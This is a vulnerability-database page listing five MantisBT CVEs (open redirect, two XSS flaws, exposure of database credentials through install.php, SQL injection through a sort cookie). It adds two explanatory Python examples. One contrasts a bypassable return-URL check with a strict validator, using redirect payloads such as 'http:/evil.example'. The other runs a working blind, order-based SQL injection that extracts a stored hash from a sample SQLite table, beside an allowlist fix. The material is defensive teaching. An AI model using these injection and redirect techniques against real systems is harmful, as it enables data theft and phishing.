
CVSS: 5.8 | EPSS: 0% | CPEs: 21 | EXPL: 2

The string_sanitize_url function in core/string_api.php in MantisBT 1.2.0a3 through 1.2.18 uses an incorrect regular expression, which allows remote attackers to conduct open redirect and phishing attacks via a URL with a ":/" (colon slash) separator in the return parameter to login_page.php. This is a different vulnerability than CVE-2014-6316.
Exploit summary: Mantis BugTracker version 1.2.19 suffers from an open redirection vulnerability.
References:
• http://packetstormsecurity.com/files/130142/Mantis-BugTracker-1.2.19-Open-Redirect.html
• http://seclists.org/fulldisclosure/2015/Jan/110
• http://www.openwall.com/lists/oss-security/2015/01/10/5
• http://www.openwall.com/lists/oss-security/2015/01/11/8
• http://www.securitytracker.com/id/1031633
• https://www.mantisbt.org/bugs/view.php?id=17997
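As an added example (not code from MantisBT and not the advisory's proof of concept), the following Python shows the bug class behind the entry above: a return-URL check that only recognises "scheme://" as absolute lets "http:/evil.example" through, and browsers normalise the single slash back to "http://evil.example". Beside it is a strict validator that accepts only a same-origin relative target. The function names, the default landing page and the candidate URLs are assumptions for illustration.

```python
import re
from urllib.parse import urlsplit

DEFAULT_LANDING = "/my_view_page.php"   # assumed fallback target, not MantisBT's

# Hypothetical pattern standing in for the buggy check: it only treats
# "scheme://" as an absolute URL, so "http:/evil.example" is not recognised.
NAIVE_ABSOLUTE_URL = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def sanitize_return_naive(url: str, default: str = DEFAULT_LANDING) -> str:
    """Bypassable variant: a single slash after the scheme slips past the
    regex, and browsers normalise 'http:/host' to 'http://host'."""
    if NAIVE_ABSOLUTE_URL.match(url) or url.startswith("//"):
        return default
    return url


def is_local_path(url: str) -> bool:
    """True only for a same-origin relative target: no scheme, no authority,
    no protocol-relative prefix, no backslashes or control characters."""
    if not url or len(url) > 2048:
        return False
    if any(ord(c) < 0x21 or ord(c) == 0x7F for c in url):
        return False          # whitespace/control characters defeat naive parsers
    if "\\" in url:
        return False          # browsers treat '\' like '/' in http(s) URLs
    if url.startswith("//"):
        return False          # '//host' and '///host' both resolve off-site
    try:
        parts = urlsplit(url)
    except ValueError:
        return False          # e.g. malformed IPv6 bracket syntax
    # urlsplit reports a scheme for 'http:/evil.example' and 'javascript:...',
    # which is exactly what the ':/' bypass relies on a regex missing.
    return not parts.scheme and not parts.netloc


def sanitize_return_strict(url: str, default: str = DEFAULT_LANDING) -> str:
    """Return the candidate only if it is a local path, else the default."""
    return url if is_local_path(url) else default


if __name__ == "__main__":
    # Constructed candidates covering the ':/' bypass and common variants.
    for candidate in ("view.php?id=17997", "http://evil.example/",
                      "http:/evil.example/", "//evil.example",
                      "///evil.example", "/\\evil.example",
                      "javascript:alert(1)"):
        print(f"{candidate!r:24} naive={sanitize_return_naive(candidate)!r:24} "
              f"strict={sanitize_return_strict(candidate)!r}")
```

The strict check deliberately rejects on structure (any scheme or authority, any backslash, any leading double slash) rather than trying to enumerate bad prefixes; a denylist regex is what failed here.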

CVSS: 4.3 | EPSS: 0% | CPEs: 2 | EXPL: 2

Cross-site scripting (XSS) vulnerability in admin/install.php in MantisBT before 1.2.19 and 1.3.x before 1.3.0-beta.2 allows remote attackers to inject arbitrary web script or HTML via the (1) admin_username or (2) admin_password parameter.
Advisory summary: MantisBT version 1.2.17 suffers from improper access control, cross site scripting, and remote SQL injection vulnerabilities.
References:
• http://seclists.org/oss-sec/2015/q1/156
• http://www.securitytracker.com/id/1031633
• https://exchange.xforce.ibmcloud.com/vulnerabilities/100209
• https://github.com/mantisbt/mantisbt/commit/132cd6d0
• https://github.com/mantisbt/mantisbt/commit/6d47c047
• https://www.htbridge.com/advisory/HTB23243
• https://www.mantisbt.org/bugs/view.php?id=17937
• https://www.mantisbt.org/bugs/view.php?id=17938
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CVSS: 7.5 | EPSS: 1% | CPEs: 2 | EXPL: 0

MantisBT before 1.2.19 and 1.3.x before 1.3.0-beta.2 does not properly restrict access to /*/install.php, which allows remote attackers to obtain database credentials via the install parameter with the value 4.
Advisory summary: MantisBT version 1.2.17 suffers from improper access control, cross site scripting, and remote SQL injection vulnerabilities.
References:
• http://seclists.org/oss-sec/2015/q1/158
• http://www.securitytracker.com/id/1031633
• https://exchange.xforce.ibmcloud.com/vulnerabilities/100211
• https://www.htbridge.com/advisory/HTB23243
• https://www.mantisbt.org/bugs/view.php?id=17937
• https://www.mantisbt.org/bugs/view.php?id=17939
CWE-284: Improper Access Control

CVSS: 6.0 | EPSS: 0% | CPEs: 2 | EXPL: 2

SQL injection vulnerability in manage_user_page.php in MantisBT before 1.2.19 and 1.3.x before 1.3.0-beta.2 allows remote administrators with FILE privileges to execute arbitrary SQL commands via the MANTIS_MANAGE_USERS_COOKIE cookie.
Advisory summary: MantisBT version 1.2.17 suffers from improper access control, cross site scripting, and remote SQL injection vulnerabilities.
References:
• http://seclists.org/oss-sec/2015/q1/157
• http://www.securitytracker.com/id/1031633
• https://exchange.xforce.ibmcloud.com/vulnerabilities/100210
• https://github.com/mantisbt/mantisbt/commit/69c2d28d
• https://github.com/mantisbt/mantisbt/commit/7cc4539f
• https://www.htbridge.com/advisory/HTB23243
• https://www.mantisbt.org/bugs/view.php?id=17937
• https://www.mantisbt.org/bugs/view.php?id=17940
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
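An added example, not MantisBT's code and not the advisory's payload, illustrating the class of bug in the entry above: a user-list page takes its sort order from a cookie and splices it into an ORDER BY clause, which cannot be bound as a prepared-statement parameter. The injected expression below leaks a stored hash one character per request purely by flipping which column the result is sorted on; the safe variant validates the cookie against an allowlist of column names and directions instead. The schema, sample rows, cookie format and function names are constructed assumptions.

```python
import sqlite3

# Allowlist for the hardened version: only these tokens may reach the query.
ALLOWED_SORT_COLUMNS = {"id", "username", "email"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}

# Constructed sample rows; hypothetical schema, not MantisBT's.
# ids and usernames are ordered oppositely so the sort key is observable.
SAMPLE_USERS = [
    (1, "carol", "carol@example.org", "c0ffee11"),
    (2, "bob",   "bob@example.org",   "deadbeef"),
    (3, "alice", "alice@example.org", "0badf00d"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "email TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def list_users_vulnerable(conn: sqlite3.Connection, sort_cookie: str) -> list:
    """Bug class from the entry: the cookie value lands verbatim in ORDER BY."""
    sql = f"SELECT username FROM users ORDER BY {sort_cookie}"
    return [row[0] for row in conn.execute(sql)]


def list_users_safe(conn: sqlite3.Connection, sort_cookie: str) -> list:
    """Hardened: the cookie may only pick a known column and direction."""
    parts = sort_cookie.split()
    if not 1 <= len(parts) <= 2:
        raise ValueError("bad sort cookie")
    column = parts[0]
    direction = parts[1].upper() if len(parts) == 2 else "ASC"
    if column not in ALLOWED_SORT_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError("bad sort cookie")
    sql = f"SELECT username FROM users ORDER BY {column} {direction}"
    return [row[0] for row in conn.execute(sql)]


def leak_hash_prefix(conn: sqlite3.Connection, user_id: int, length: int,
                     alphabet: str = "0123456789abcdef") -> str:
    """Blind, order-based extraction through the vulnerable listing.

    The injected CASE sorts by id when the guess is right (first row is
    'carol') and by username when it is wrong (first row is 'alice'), so the
    response order leaks one character of the target's hash per probe.
    """
    known = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            guess = known + ch
            payload = (
                "(CASE WHEN (SELECT substr(password_hash, 1, {n}) FROM users "
                "WHERE id = {uid}) = '{g}' THEN id ELSE username END)"
            ).format(n=pos, uid=user_id, g=guess)
            if list_users_vulnerable(conn, payload)[0] == "carol":
                known = guess
                break
        else:
            raise RuntimeError(f"no candidate matched at position {pos}")
    return known


if __name__ == "__main__":
    db = make_db()
    print("leaked prefix:", leak_hash_prefix(db, 1, 4))
    print("safe, username DESC:", list_users_safe(db, "username DESC"))
    try:
        list_users_safe(db, "(CASE WHEN 1=1 THEN id ELSE username END)")
    except ValueError as exc:
        print("rejected:", exc)
```

The lesson generalises beyond this cookie: any identifier position in SQL (column, table, direction) has to be resolved through an allowlist in code, because placeholders only cover values.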

CVSS: 2.6 | EPSS: 0% | CPEs: 42 | EXPL: 0

Cross-site scripting (XSS) vulnerability in helper_api.php in MantisBT 1.1.0a1 through 1.2.x before 1.2.18, when the Extended project browser is enabled, allows remote attackers to inject arbitrary web script or HTML via the project cookie.
References:
• http://seclists.org/oss-sec/2014/q4/867
• http://seclists.org/oss-sec/2014/q4/902
• http://secunia.com/advisories/62101
• http://www.debian.org/security/2015/dsa-3120
• https://github.com/mantisbt/mantisbt/commit/511564cc
• https://www.mantisbt.org/bugs/view.php?id=17890
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')